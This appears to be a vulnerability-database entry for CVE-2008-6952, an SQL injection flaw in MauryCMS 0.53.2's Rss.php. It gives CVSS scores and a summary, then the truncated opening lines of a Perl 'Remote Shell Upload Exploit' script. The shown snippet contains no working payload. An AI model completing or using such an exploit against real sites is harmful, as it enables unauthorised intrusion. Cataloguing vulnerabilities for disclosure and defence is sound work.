7.5
CVSSv2

CVE-2008-6952

Published: 12/08/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in Rss.php in MauryCMS 0.53.2 and previous versions allows remote malicious users to execute arbitrary SQL commands via the c parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

cms.maury91 maurycms 0.53.2

Exploits

#!/usr/bin/perl =about MauryCMS <= 0532 Remote Shell Upload Exploit ---------------------------------------------- by athos - staker[at]hotmail[dot]it download on cmsmaury91org thnx Osirys =cut use strict; use warnings; use LWP::UserAgent; my ($http,$post,$user,$pass,@auth,@read,$shell); my $host = shift @AR ...